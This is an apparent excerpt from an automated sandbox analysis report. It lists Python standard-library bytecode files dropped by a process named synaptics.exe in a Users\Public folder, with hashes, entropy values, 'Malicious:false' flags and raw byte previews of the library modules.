                                                                                                                                                                                      Preview:o........'-d0........................@...sJ...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z d*Z!d+Z"e"Z#d,Z$d-Z%d.Z&d/Z'd0Z(d-Z)d.Z*d/Z+d1Z,d2Z-d3Z.d.Z/d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5d.Z6d.Z7d3Z8d2Z9d.Z:d4Z;d5Z<d6Z=d7Z>d8Z?e.d9f.e.d:f.e.d;f.e.d<f.e.d=f.e.d>f.e.d?f.f.e)d@f.f.e*dAf.f.e+e!B.d:f.e!dBf.e+dCf.f.e-d@f.f.e.dAf.f.e/e"B.d:f.e"dBf.e/dCf.f.e1d@f.f.e2dAf.f.e3e$B.dDf.e$dEf.e3dCf.f.f.Z@dFdG..ZAd2ZBd*ZCd/ZDd3ZEd.ZFd.ZGd.ZHd.ZId.ZJd5ZKd.ZLd.ZMd+ZNd,ZOd.ZPd-ZQd4ZRz.d.dHlST.W.dIS...eT..y$......Y.dIS.w.)JzoConstants/functions for interpreting results of os.stat() and os.lstat()...Suggested usage: from stat import *...................................................c....................C........|.d.@.S.).zMReturn the portion of the file's mode that can be set by. os.chmod().. i..........moder....r.....(C:\Users\Public\QExvbmVOb25l\lib\stat.py..S_IMODE........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7115
                                                                                                                                                                                      Entropy (8bit):5.38710397186473
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:HLetNTT8nDlw15VntHYdo5H2vHA4yN/uZ1qkwto:SbTT8nhM5Vth5H2vHA4yN/G1qkwto
                                                                                                                                                                                      MD5:23FB31B14D8338DE0BE78C4DDD268182
                                                                                                                                                                                      SHA1:E33D26865D2BB3549A1BD7C93CEAEB7AEE76CBFD
                                                                                                                                                                                      SHA-256:E5281A6969CF892DEF4FCB069D514896C2E4544BCE61EDFE198C82E7B362969B
                                                                                                                                                                                      SHA-512:006587C32E18663AC50C2C543DC4F61CC5E0619E1FB3F452669ECE7316FE3CB387ABE375C6A344ABC8C537F13FBC7CB3D82487D217FB49F98D93F1F6924D6027
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d^*.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.e.e...Z.d.Z.e.d...d...Z.d.Z.d.Z.e.e...e...e...Z.d.d.d...Z.d.d.l.Z.d.d.l.m.Z...i.Z.G.d.d...d...Z.e.......G.d.d...d...Z.d.S.).an...A collection of string constants...Public module variables:..whitespace -- a string containing all ASCII whitespace.ascii_lowercase -- a string containing all ASCII lowercase letters.ascii_uppercase -- a string containing all ASCII uppercase letters.ascii_letters -- a string containing all ASCII letters.digits -- a string containing all ASCII decimal digits.hexdigits -- a string containing all ASCII hexadecimal digits.octdigits -- a string containing all ASCII octal digits.punctuation -- a string containing all ASCII punctuation characters.printable -- a string containing all ASCII characters considered printable..)...ascii_letters..ascii_lowercase..ascii_uppercase..capwords..digits..hexdigits..octdigits..printable..punctuation..whitespace..Formatter..Template.....Nz. .....Z.abcdefg
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17088
                                                                                                                                                                                      Entropy (8bit):5.694559665474942
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:rORubSi/2orlLbqOf9dzA3gfqtv+ScNDMI7BHMi+yDnuxb3rOyb5:rOkbSi+orM29JlqtvtcNoI7BHzxzra
                                                                                                                                                                                      MD5:6C38948CC946B04B221DFD220C5F49F9
                                                                                                                                                                                      SHA1:54ABE2300EA30F0270AF3A12F9ECDEA26ED24E6A
                                                                                                                                                                                      SHA-256:67C2711135D4F83490336621306D7295458176EB7E3E68AAC15609A4F3E1D947
                                                                                                                                                                                      SHA-512:4048FE9EEDB2A9949F001DF55F0D036F4267468BEDCA06DBEF4821342EA1177F5549C23F9369304373F460EF75D3C6E787F64F9FA839FA57034A00DF2D1BE6EE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.3.......................@...s....d.Z.d.d.l.m.Z...e.j.d.k.s.J...d.d...Z.e.g.d...e.e.d.d.........Z.d.d...Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d&..d'd(..d)d*..d+d,..i.d-d...d/d0..d1d2..d3d ..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG..dHdI..dJdK..dLdM....i.dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\dM..d]dO..d^dQ..d_dS..d`dU..dadW..dbdY..dcd[..ddde..dfdg....i.dhdi..djdk..dldm..dndo..dpdq..drds..dtde..dudg..dvdi..dwdk..dxdm..dydo..dzdq..d{ds..d|d}..d~d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d}..d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d...d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):320
                                                                                                                                                                                      Entropy (8bit):5.123421822560025
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/XextfvXhzYXcCuYKvg6FraMaVkoopngmIQNaHxEMW/Zkn:Cuxt35YXcaKvjFrDaVkoeWlW/Zkn
                                                                                                                                                                                      MD5:65D5D9ECF82DDF192FCF1B3E5D99D18F
                                                                                                                                                                                      SHA1:582680ADC5A0F50901BF5B75D6720CA1042BC833
                                                                                                                                                                                      SHA-256:89D26DF9CBE43882A03A4C03AD729CE753884C2AEBD456C6EC4C37317B6F9F2F
                                                                                                                                                                                      SHA-512:6DCEAB10D57749E72E14F41E5EE7EC4FFA968FB2967B06F9B6FD73BDD9CC3F19F87365B97A914CB57B6315DA680A8911C4ABD962BD687959D534F68EE691CD12
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s,...g.d...Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.S.).).Z.calcsize..packZ.pack_into..unpackZ.unpack_fromZ.iter_unpack..Struct..error.....)...*)..._clearcache)...__doc__N)...__all__Z._structr....r......r....r.....*C:\Users\Public\QExvbmVOb25l\lib\struct.py..<module>....s............
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44754
                                                                                                                                                                                      Entropy (8bit):5.609300644883295
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:Eu0RXvdDf8N6wQVIGcx35LU1w2mDQkW4Oc+clEJn7Zk199DNSauyP4W3ggSegvc7:T0RXvZsjUeV0kzD+clEoSauLWeOQZcp
                                                                                                                                                                                      MD5:B2F6298AC7B994FFA2BFAAC1061702B6
                                                                                                                                                                                      SHA1:55D3856B0FCE0A586A385BA04793D53B06C30420
                                                                                                                                                                                      SHA-256:BB63432DB5E07309130A93AB2C34C47A8963A5E50ADED1C31FB7EC279E36065B
                                                                                                                                                                                      SHA-512:675BDB61A52244D94AC0BEA4F9BDE20564D8A19FF7476446E2C147F1B2D03601DBEA9D5B6171311761472AFEFF595F950F4DFB211049684017C544899B37AEEF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.S.......................@...sp...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.z.d.d.l.Z.W.n...e.yE......d.Z.Y.n.w.g.d...Z.z.d.d.l.Z.d.d.l.Z.d.Z.W.n...e.ym......d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.Y.n0w.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)..e..*g.d.......G.d.d...d.e+..Z,G.d.d...d.e,..Z-G.d.d...d.e,..Z.e.r.G.d.d...d...Z/G.d.d...d.e0..Z1n.e2e.d.d...Z3e4e.d...r.e.j5Z6n.e.j7Z6e.r.d.Z8d.d...Z9n.g.Z8d.d...Z9d.Z:d.Z;d.Z<d.d...Z=d.d...Z>d.d ..d!d"..Z?d#d$..Z@d.d ..d%d&..ZAG.d'd(..d(eB..ZCd.d.d.d.d)..d*d+..ZDd,d-..ZEd.d/..ZFd0d1..ZGd2d3..ZHeH..ZId.ZJG.d4d5..d5..ZKd.S.)6a....Subprocesses with accessible I/O streams..This module allows you to spawn processes, connect to their.input/output/error pipes, and obtain their return codes...For a complete description of this module see the Python documentation...Main API.========.run(...): Runs a command, waits for it to complete, then returns a.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24077
                                                                                                                                                                                      Entropy (8bit):5.282038613874124
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:8GeO1Q/N1bmiY+HWkXkYibq1vElkl0kwgbdxXrzpRwJcNrxSejqX1uk:LeQ81bminYBmvEKKkwovXbKMdTqX1uk
                                                                                                                                                                                      MD5:20C663DDEAC18497FA7BC16337637762
                                                                                                                                                                                      SHA1:6E40D841307BBD698DFF1D6875650BB9FAA3CED1
                                                                                                                                                                                      SHA-256:F177B7AB12E6FA6DADDA96A52678549A745A1D8E44E4B5DCC748D303651B0A13
                                                                                                                                                                                      SHA-512:FA72BFC5E9C84C67D863F5DEBF108732DA36C6250C1824C4EAD0FE74B4864776830D8E432089E9EE06AA2D53544E202A7CBD75CE3D63D498509EB9F3955A187F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dku.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.Z.e.j.e.j.B.e.j.B.Z.e.e.d...rJe.e.j.O.Z.e.Z e.e.d...rVe e.j!O.Z e.e.d...r_e.j"Z"n.d.Z"d.Z#e...Z$d.d...Z%d.d...Z&d.d...Z'G.d.d...d...Z(d.d...Z)d.d...Z*d.a+d.d...Z,d.d...Z-d.d...Z.d.d...Z/d.a0d.d...Z1d d!..Z2d"d#..Z3d?d%d&..Z4d@d'd(..Z5d)e#d.f.d*d+..Z6G.d,d-..d-..Z7G.d.d/..d/..Z8.....2dAd.d3..d4d5..Z9e.j:d6k.s.e.j;d7k.r.e9Z<n.e.e.d8..a=......dBd.d3..d9d:..Z<G.d;d<..d<..Z>G.d=d>..d>..Z?d.S.)Ca....Temporary files...This module provides generic, low- and high-level interfaces for.creating temporary files and directories. All of the interfaces.provided by this module can be used without fear of race conditions.except for 'mktemp'. 'mktemp' is subject to race conditions and.should not be used; it is provided for backward compatibility only...The default path names are returned as str. If you supply bytes as.input, all return values will b
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13825
                                                                                                                                                                                      Entropy (8bit):5.341703197070515
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:CB47dUTOzzlFEYKRuPSzqjNGmwImkWf8FBQ:CB47dzF/5JNG5MkkBQ
                                                                                                                                                                                      MD5:B3A940F042678DCFD286D8785D25DF91
                                                                                                                                                                                      SHA1:172795913DA8B32120E6B0BE01E4CE152FABA2A7
                                                                                                                                                                                      SHA-256:6BD15818608B79839DCC149D94E19A71F0DF574217A9C1DD0ACE22B2631E0CD7
                                                                                                                                                                                      SHA-512:978CA4A715A586BC617FF02A8FE395719051CD4808623C1AD906BC9B0792725A0A7643114D5EE8F5E9AED9B92D4843BC584EE5CB6BD1126B8E9ED38027AFE5D5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d*O.......................@...s....d.Z.d.d.l.Z.g.d...Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.e...d.e.j...Z.e...d.e.j...Z.d.d...Z.d.d.d...Z.e.d.k.rDe.e.d.......d.S.d.S.).z.Text wrapping and filling.......N)...TextWrapper..wrap..fill..dedent..indent..shortenz...... c....................@...s....e.Z.d.Z.d.Z.i.Z.e.d...Z.e.D.].Z.e.e.e.e...<.q.d.Z.d.Z.d.e...e.....Z.d.e.d.d.......Z.e...d.e.e.e.e.d.....e.j...Z.[.[.[.e...d.e.....Z.[.e...d...Z.....................d&d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d.S.)'r....a..... Object for wrapping/filling text. The public interface consists of. the wrap() and fill() methods; the other methods are just there for. subclasses to override in order to tweak the default behaviour.. If you want to completely replace the main wrapping algorithm,. you'll probably have to override _wrap_chunks()... Several instance attributes control various aspects of wrapping:. width (default:
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44982
                                                                                                                                                                                      Entropy (8bit):5.172783428116464
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:d1A/MIxOwAgbSGxwbNNo+rkPsXj16a1Zmi8Y2S41QrTrWOnO8F8+6LcAQJWBpSUW:d2/8Zf2lbPs/v612aOBy4kSUpx05izap
                                                                                                                                                                                      MD5:C1A602F9E9EA7E248BA3C6C665CC7127
                                                                                                                                                                                      SHA1:7219313B9414A6D3CA2D02275DE4E7ED93F213D1
                                                                                                                                                                                      SHA-256:D31D9AD5939F5BE84955708DA680FEB7B2BFF6515C9E0D05D41542D48EC8347C
                                                                                                                                                                                      SHA-512:DD24098ABBC6659D4F370FBC0BE4C8F8D40C793C8079D401EFA1320A2AE9A10F2F0BEC8AA507FB1CC2B920BA622D579B906250779DA8891427797E7FDF52C359
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s6...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...z.d.d.l.m.Z...W.n...e.y=......d.d.l.m.Z...Y.n.w.g.d...Z.e.j.Z.e.j.Z.e.j.Z.e.j.Z.z.e.j.Z.d.Z.e...d.....W.n...e ye......d.Z.Y.n.w.e.j!Z"z.e.j#Z$W.n...e yy......d.Z$Y.n.w.e.j%Z%[.d.a&d.a'd.d...Z(d.d...Z)d.d...Z*d.d...Z+e.Z,d.d...Z#G.d.d...d...Z-e-Z.G.d.d...d...Z/G.d.d...d...Z0G.d.d...d.e0..Z1G.d.d...d...Z2G.d.d ..d ..Z3G.d!d"..d"e4..Z5e.d#..j6Z7d$d%..Z8e#..a9i.Z:i.Z;e...Z<e...a=e>..a?d&d'..Z@G.d(d)..d)..ZAz.d.d*l.mBaCmDZE..W.n#..e...y.......d.d+lFmGZH..d.d,l.mIZI..eId-d...ZDd/d-..ZEd0d1..aCY.n.w.tCZJd2d3..ZKG.d4d5..d5eA..ZLG.d6d7..d7eA..ZMG.d8d9..d9eA..ZNd:d;..ZOd<d=..ZPd>d?..ZQd@dA..ZRdBdC..ZSdDdE..ZTg.ZUd.aVdFdG..ZWd.dHl.mXZX..eM..aYdIdJ..ZZdKdL..Z[z.d.dMl.m\Z]..W.n...e...y.......d.dNl^m]Z]..Y.n.w.dOdP..Z_e`e.dQ....r.e.jae_dR....d.S.d.S.)Sz;Thread module emulating a subset of Java's threading model......N)...monotonic)...WeakSet)...islice..count)...deque)...get_ident
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2751
                                                                                                                                                                                      Entropy (8bit):5.778755577479554
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:6HWS58lFEOqIlPBJR41EYBzH3ch9C7Q7WnvKQvVgkGQLU:6HWSOFEOb5nFYBb3ch9T6qKLU
                                                                                                                                                                                      MD5:8A942A29802294F36291286B1551C570
                                                                                                                                                                                      SHA1:F939C32A0DDC8DCEB7626BD1503E37049DE40D54
                                                                                                                                                                                      SHA-256:2761365AB75BC37B835ED32F18750AA2790668006B55E0A0143AE4A030D1C396
                                                                                                                                                                                      SHA-512:8C837729FB064DB8885F9B7D71E4D882DD3B0978B82B9AA4FC1C0AB54387F5EB9C0FC998001352FF5E334E4CBCAA0063C1E9995229859A7BBD368386BDAD2054
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sF...d.Z.g.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z d!Z!d"Z"d#Z#d$Z$d%Z%d&Z&d'Z'd(Z(d)Z)d*Z*d+Z+d,Z,d-Z-d.Z.d/Z/d0Z0d1Z1d2Z2d3Z3d4Z4d5Z5d6Z6d7Z7d8Z8d9Z9d:Z:d;Z;d<Z<d=Z=d>Z>d?Z?d@Z@dAZAdBZBdCZCdDdE..eD...E..D...ZFe..GeF.H......i.dFe...dGe...dHe*..dIe...dJe+..dKe...dLe...dMe...dNe%..dOe0..dPe(..dQe...dRe&..dSe...dTe...dUe'..dVe5..i.dWe...dXe6..dYe...dZe1..d[e2..d\e)..d]e...d^e7..d_e...d`e...dae#..dbe...dce...dde...dee...dfe...dge ....e$e/e3e4e.e.e"e-e.e.e,e.e!dh....ZIdidj..ZJdkdl..ZKdmdn..ZLdoS.)pz.Token constants.)...tok_name..ISTERMINAL..ISNONTERMINAL..ISEOF................................................................................................................................................................. ....!...."....#....$....%....&....'....(....)....*....+....,....-........./....0....1....2....3....4....5....6....7....8....9....:....;....<....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17207
                                                                                                                                                                                      Entropy (8bit):5.78025405754347
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:pSAswui0pcPm6mE93/w3CNgM/0n/JM7XHVOBnaH:pmiLPm3E93/wyNgM/EElOBnaH
                                                                                                                                                                                      MD5:2F81B5A7DF51D2D496920A8E8FA0B26F
                                                                                                                                                                                      SHA1:C9B6DB93E64F5BE3C05409C4865D79FF8ECD6A19
                                                                                                                                                                                      SHA-256:25E9BC3CAC1257B8CDC48A148E6B769F23931D19A86FA359508013D7ED9986E5
                                                                                                                                                                                      SHA-512:39219EF766E0D8C960B703FF0331D5922BAD94B54C2B25145FC272E0493EEFF5F459E160430FAC90A8CF0715E36EAB1CB33F44358354DC1A5810B03AE03E9AB3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.g.......................@...sT...d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...e...d.e.j...Z.e...d.e.j...Z.d.d.l.Z.e.j.g.d.....Z.[.G.d.d...d.e...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.e.e.d.e.......e.e.....Z.d.Z d.Z!d.Z"d.Z#d.Z$e.e!e"e#e$..Z%d.Z&e.d.d ..e.e&....Z'd!e&..Z(e.e'e(..Z)e.d"e)d#....Z*e.e*e)e%..Z+d$d%..Z,e.j-d&d'....Z.e.e,....Z/d(Z0d)Z1d*Z2d+Z3e.e/d,..e/d-....Z4e.e/d...e/d/....Z5e.e6e.j7e8e.d0d1......Z9e.d2e9..Z:e.e+e:e5e ..Z;e.e;..Z<e.e/d3..e.d4d.....e/d5..e.d6d.......Z=e.d7e.e4..Z>e.e.e>e+e:e=e ....Z?i.Z@e,..D.].ZAe0e@eAd4..<.e1e@eAd6..<.e2e@eAd,..<.e3e@eAd-..<...q.eB..ZCeB..ZDe,..D.]%ZEeEd6..eEd4..f.D.].ZFeC.GeF......qIeEd-..eEd,..f.D.].ZFeD.GeF......qZ..q?d8ZHG.d9d:..d:eI..ZJG.d;d<..d<eI..ZKG.d=d>..d>..ZLd?d@..ZMdAdB..ZNdCdD..ZOdEdF..Z.dGdH..ZPdIdJ..ZQdKdL..ZRdMdN..ZSeTdOk...r.eS....d.S.d.S.)Pao...Tokenization help for Python programs...tokenize(readline) is a generator that breaks a stream
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21721
                                                                                                                                                                                      Entropy (8bit):5.2962014434950175
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:IoooGsSgHvgJJpLbiO+pSbnwRG+SbL3JWFsFmppQigBsKU9l4UiTdBq:IooncHvIJpiJAngzSBhU9l4UiTdBq
                                                                                                                                                                                      MD5:BB16E21B872D39504B7A173B439C750D
                                                                                                                                                                                      SHA1:753011F314235186293400EB9BA8B09CCA11B8D9
                                                                                                                                                                                      SHA-256:EAC5FB0155054EB640618EC90127C5B6BD10E8A36C05D39F9AA6CF6B73CE301F
                                                                                                                                                                                      SHA-512:65224BD422A1C152FD5590E936E8F4B183EDF7EB9F5AE455F4953E544F113DAB140FB4EDEA88480BF9FBE5F50010A85693682A9A9F47572D94EEB6403B45874D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.i.......................@...sJ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d8d.d...Z.d.d...Z.d9d.d...Z.d8d.d...Z.d8d.d...Z.d.Z.d.Z.G.d.d...d...Z.e...Z.d.d...Z.e.e.d.d.d.f.d.d...Z.e.e.d.d.f.d.d...Z.e.f.d.d...Z.d.d...Z.d.d...Z.d:d.d ..Z.d;d!d"..Z.d:d#d$..Z.d<d%d&..Z.d9d'd(..Z.d9d)d*..Z.d+d,..Z.G.d-d...d...Z.d/d0..Z.d1d2..Z.d3Z.G.d4d5..d5e ..Z!G.d6d7..d7..Z"d.S.)=z@Extract, format and print information about Python stack traces......N)...extract_stack..extract_tb..format_exception..format_exception_only..format_list..format_stack..format_tb..print_exc..format_exc..print_exception..print_last..print_stack..print_tb..clear_frames..FrameSummary..StackSummary..TracebackException..walk_stack..walk_tbc....................C...s4...|.d.u.r.t.j.}.t...|.......D.].}.t.|.|.d.d.....q.d.S.).zyPrint the list of tuples as returned by extract_tb() or. extract_stack() as a formatted stack trace to the given file.N......file..end)...sys..stderrr......from_list..format..print)...extracted_l
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9538
                                                                                                                                                                                      Entropy (8bit):5.148392423531561
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:W8BGSXkI304JX7ad5RV7VIPNmXkXFNlO8U2UuLWnxq3juXvypQ1SwDFBL0GSSSO9:jBGgf9oV4NmAFyvWLwx8pOXU/I+rjmV
                                                                                                                                                                                      MD5:7C792029776160273C123FABC37270B2
                                                                                                                                                                                      SHA1:62953166BEB72D5F306E02EE3DFFBB777054E35B
                                                                                                                                                                                      SHA-256:32C278122BB2D0444FA29A1A65420931042B7F74746E08921C37E36BEE2C2C68
                                                                                                                                                                                      SHA-512:5FC5473C024E8D44498C24089C4993B5CDE066F18CC2B9730DA7BFE457D63930DAB609DB98ECE78CF016F505FDD05B55B152155B3A3EF19EDD76D0165A37C82C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.(.......................@...s....d.Z.d.d.l.Z.d.d...Z.e.e...Z.e.d.d.....Z.e.e.j...Z.e.e.j...Z.e.e.j...Z.d.d...Z.e.e.....Z.d.d...Z.e.e.....Z.d.d...Z.e...Z.e.e...Z.e.......d.d...Z.e...Z.e.e...Z.G.d.d...d...Z.e.e...j...Z.e.e...Z.e.g.j...Z.e.e.j...Z.e.e...j...Z e.e!j"..Z#e.e$j.d.....Z%e.e...Z&z.e'....e'y.......e..(..d...Z)e.e)..Z*e.e)j+..Z,d.Z)[)Y.n.w.e.e.j...Z-e.e.j...Z/[.[.[.[.[.[.d$d.d...Z0d.d...Z1d%d.d...Z2d.d...Z3G.d.d...d...Z4G.d.d...d...Z5d d!..Z6e.e7e8....Z9e.e8e!B...Z:e.e;..Z<e.d...Z=e.e>..Z?d"d#..e@..D...ZAd.S.)&zO.Define names for built-in types that aren't directly accessible as a builtin.......Nc....................C........d.S...N..r....r....r.....)C:\Users\Public\QExvbmVOb25l\lib\types.py.._f...........r....c....................C...r....r....r....r....r....r....r......<lambda>....r....r....c........................s....d.....f.d.d...}.|.j.d...S.).N.....c........................r....r....r....r........ar....r......f....r....z._cell_factory.<locals>.fr....)...__clo
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):85290
                                                                                                                                                                                      Entropy (8bit):5.274882798428899
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:XCKtWnXfBkzWWZGNt2akuICUSA3yZSIKug/kzVWqn1poHezYRXH1UXWbAyitL5U+:SSoWu54ug8fAHecVD8Vo+
                                                                                                                                                                                      MD5:692B81AADB3B595AB367EC459BEB25D1
                                                                                                                                                                                      SHA1:3104B0883078C1D095C69152D7AE35C1568B97C4
                                                                                                                                                                                      SHA-256:5EE17AE8C86C4F07660FD0F0374045D3058D4874BFF7066B76AFA4562B2E61CB
                                                                                                                                                                                      SHA-512:A1D9ABAE52471A98C7E2D9C04B1AB1E7121B1267EAC908DB51774A242775258B43A22ACA67A7595CCEDD9B90F0DD59F247F11C1AD5617B60D691D12B2FD57A3B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
